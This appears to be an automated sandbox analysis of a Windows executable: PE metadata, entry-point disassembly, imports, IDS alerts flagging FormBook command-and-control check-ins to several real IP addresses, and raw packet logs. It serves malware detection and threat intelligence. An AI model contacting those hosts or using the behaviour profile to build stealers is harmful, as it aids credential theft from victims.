                                                                                        Entrypoint:0x420577
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x6724106E [Thu Oct 31 23:19:10 2024 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:5
                                                                                        OS Version Minor:1
                                                                                        File Version Major:5
                                                                                        File Version Minor:1
                                                                                        Subsystem Version Major:5
                                                                                        Subsystem Version Minor:1
                                                                                        Import Hash:948cc502fe9226992dce9417f952fce3

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        call 00007F41948E00A3h
                                                                                        jmp 00007F41948DF9AFh
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        push esi
                                                                                        push dword ptr [ebp+08h]
                                                                                        mov esi, ecx
                                                                                        call 00007F41948DFB8Dh
                                                                                        mov dword ptr [esi], 0049FDF0h
                                                                                        mov eax, esi
                                                                                        pop esi
                                                                                        pop ebp
                                                                                        retn 0004h
                                                                                        and dword ptr [ecx+04h], 00000000h
                                                                                        mov eax, ecx
                                                                                        and dword ptr [ecx+08h], 00000000h
                                                                                        mov dword ptr [ecx+04h], 0049FDF8h
                                                                                        mov dword ptr [ecx], 0049FDF0h
                                                                                        ret
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        push esi
                                                                                        push dword ptr [ebp+08h]
                                                                                        mov esi, ecx
                                                                                        call 00007F41948DFB5Ah
                                                                                        mov dword ptr [esi], 0049FE0Ch
                                                                                        mov eax, esi
                                                                                        pop esi
                                                                                        pop ebp
                                                                                        retn 0004h
                                                                                        and dword ptr [ecx+04h], 00000000h
                                                                                        mov eax, ecx
                                                                                        and dword ptr [ecx+08h], 00000000h
                                                                                        mov dword ptr [ecx+04h], 0049FE14h
                                                                                        mov dword ptr [ecx], 0049FE0Ch
                                                                                        ret
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        push esi
                                                                                        mov esi, ecx
                                                                                        lea eax, dword ptr [esi+04h]
                                                                                        mov dword ptr [esi], 0049FDD0h
                                                                                        and dword ptr [eax], 00000000h
                                                                                        and dword ptr [eax+04h], 00000000h
                                                                                        push eax
                                                                                        mov eax, dword ptr [ebp+08h]
                                                                                        add eax, 04h
                                                                                        push eax
                                                                                        call 00007F41948E274Dh
                                                                                        pop ecx
                                                                                        pop ecx
                                                                                        mov eax, esi
                                                                                        pop esi
                                                                                        pop ebp
                                                                                        retn 0004h
                                                                                        lea eax, dword ptr [ecx+04h]
                                                                                        mov dword ptr [ecx], 0049FDD0h
                                                                                        push eax
                                                                                        call 00007F41948E2798h
                                                                                        pop ecx
                                                                                        ret
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        push esi
                                                                                        mov esi, ecx
                                                                                        lea eax, dword ptr [esi+04h]
                                                                                        mov dword ptr [esi], 0049FDD0h
                                                                                        push eax
                                                                                        call 00007F41948E2781h
                                                                                        test byte ptr [ebp+08h], 00000001h
                                                                                        pop ecx

                                                                                        Rich Headers

                                                                                        Programming Language:
                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                        • [IMP] VS2008 SP1 build 30729

                                                                                        Data Directories

                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000xb7c70.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x18c0000x7594.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                        Sections

                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                        .rsrc0xd40000xb7c700xb7e009ca1a06589e0f4dd155169bf4c49034cFalse0.9651358557104011data7.966481853020651IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0x18c0000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                        Resources

                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_ICON0xd44a00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                        RT_ICON0xd45c80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                        RT_ICON0xd48b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                        RT_ICON0xd49d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                        RT_ICON0xd58800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                        RT_ICON0xd61280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                        RT_ICON0xd66900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                        RT_ICON0xd8c380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                        RT_ICON0xd9ce00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                        RT_STRING0xda1480x594dataEnglishGreat Britain0.3333333333333333
                                                                                        RT_STRING0xda6dc0x68adataEnglishGreat Britain0.2735961768219833
                                                                                        RT_STRING0xdad680x490dataEnglishGreat Britain0.3715753424657534
                                                                                        RT_STRING0xdb1f80x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                        RT_STRING0xdb7f40x65cdataEnglishGreat Britain0.34336609336609336
                                                                                        RT_STRING0xdbe500x466dataEnglishGreat Britain0.3605683836589698
                                                                                        RT_STRING0xdc2b80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                        RT_RCDATA0xdc4100xaf308data1.0003149492179226
                                                                                        RT_GROUP_ICON0x18b7180x76dataEnglishGreat Britain0.6610169491525424
                                                                                        RT_GROUP_ICON0x18b7900x14dataEnglishGreat Britain1.15
                                                                                        RT_VERSION0x18b7a40xdcdataEnglishGreat Britain0.6181818181818182
                                                                                        RT_MANIFEST0x18b8800x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                                        Imports

                                                                                        DLLImport
                                                                                        WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                                        VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                        COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                        MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                                        WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                                        PSAPI.DLLGetProcessMemoryInfo
                                                                                        IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                                        USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                                        UxTheme.dllIsThemeActive
                                                                                        KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                                                        USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                                                        GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                                                        COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                        ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                                                        SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                                                        ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                        OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                                                                                        Possible Origin

                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                        EnglishGreat Britain

                                                                                        Network Behavior

                                                                                        Suricata IDS Alerts

                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-11-01T19:43:05.133750+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.449730TCP
                                                                                        2024-11-01T19:43:44.039474+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.449736TCP
                                                                                        2024-11-01T19:44:02.875031+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449822188.114.96.380TCP
                                                                                        2024-11-01T19:44:05.578168+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449836188.114.96.380TCP
                                                                                        2024-11-01T19:44:08.172209+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449853188.114.96.380TCP
                                                                                        2024-11-01T19:44:16.407692+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4499003.33.130.19080TCP
                                                                                        2024-11-01T19:44:18.981201+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4499163.33.130.19080TCP
                                                                                        2024-11-01T19:44:21.525519+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4499323.33.130.19080TCP
                                                                                        2024-11-01T19:44:30.546887+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449981154.23.184.9580TCP
                                                                                        2024-11-01T19:44:33.109508+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449996154.23.184.9580TCP
                                                                                        2024-11-01T19:44:35.609511+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450011154.23.184.9580TCP
                                                                                        2024-11-01T19:44:44.513285+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450016172.67.185.2280TCP
                                                                                        2024-11-01T19:44:47.090485+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450017172.67.185.2280TCP
                                                                                        2024-11-01T19:44:49.639229+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450018172.67.185.2280TCP
                                                                                        2024-11-01T19:44:58.423225+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450020206.119.82.17280TCP
                                                                                        2024-11-01T19:45:00.987680+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450021206.119.82.17280TCP
                                                                                        2024-11-01T19:45:03.578156+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450022206.119.82.17280TCP
                                                                                        2024-11-01T19:45:21.875133+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450024103.191.208.13780TCP
                                                                                        2024-11-01T19:45:24.423787+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450025103.191.208.13780TCP
                                                                                        2024-11-01T19:45:26.984652+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450026103.191.208.13780TCP
                                                                                        2024-11-01T19:45:36.437601+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500283.111.160.21680TCP
                                                                                        2024-11-01T19:45:38.984458+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500293.111.160.21680TCP
                                                                                        2024-11-01T19:45:41.671964+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500303.111.160.21680TCP
                                                                                        2024-11-01T19:45:50.047522+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450032203.161.49.19380TCP
                                                                                        2024-11-01T19:45:52.949936+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450033203.161.49.19380TCP

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Nov 1, 2024 19:43:45.159183979 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:45.164201975 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.164287090 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:45.170517921 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:45.175337076 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.850938082 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.851000071 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.851082087 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.851093054 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.851103067 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.851174116 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:45.851255894 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:45.851265907 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.851277113 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.851351023 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:45.851414919 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.851468086 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:45.851475954 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.851658106 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.851720095 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:45.856249094 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.856261969 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.856272936 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.856287003 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.856339931 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:45.856401920 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:45.883326054 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.883342981 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.883481979 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:45.973846912 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.973915100 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.973926067 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.973937035 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.973948956 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.973978043 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:45.974042892 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:45.974138975 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.974148989 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.974217892 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:45.974380970 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.974391937 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.974402905 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.974416971 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.974442005 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:45.974442005 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:45.974911928 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.974922895 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.974929094 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.974937916 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.974951029 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.974970102 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:45.975004911 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:45.975004911 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:45.975565910 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.975585938 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.975596905 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.975636959 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:45.975672007 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.975682020 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:45.975723028 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.006005049 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.006062031 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.006072044 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.006114006 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.006153107 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.006223917 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.006234884 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.006242990 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.006339073 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.046838999 CET4973880192.168.2.438.47.237.27
                                                                                        Nov 1, 2024 19:43:46.096213102 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.096298933 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.096307993 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.096317053 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.096334934 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.096352100 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.096364975 CET804973838.47.237.27192.168.2.4
                                                                                        Nov 1, 2024 19:43:46.096375942 CET804973838.47.237.27192.168.2.4
